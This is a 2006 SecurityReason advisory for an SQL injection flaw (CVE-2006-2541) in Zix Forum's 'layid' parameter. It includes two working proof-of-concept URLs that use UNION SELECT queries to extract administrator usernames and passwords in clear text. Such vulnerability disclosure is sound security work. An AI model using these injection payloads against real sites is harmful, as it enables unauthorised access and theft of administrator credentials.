|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 946 CVE : CVE-2006-2541 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : i6d hotmail com Published : 25.05.2006
Advisory Content : Zix Forum <= 1.12 (layid) SQL Injection Vulnerability Vulnerability: -------------------- SQL_Injection: Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation extracts username and password of administrator in clear text . Proof of Concepts: -------------------- site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,n ull,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1 ,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1' site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1 ,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1 ,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1' ------- By PHP Emperor # i6d[at]hotmail[dot]com  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |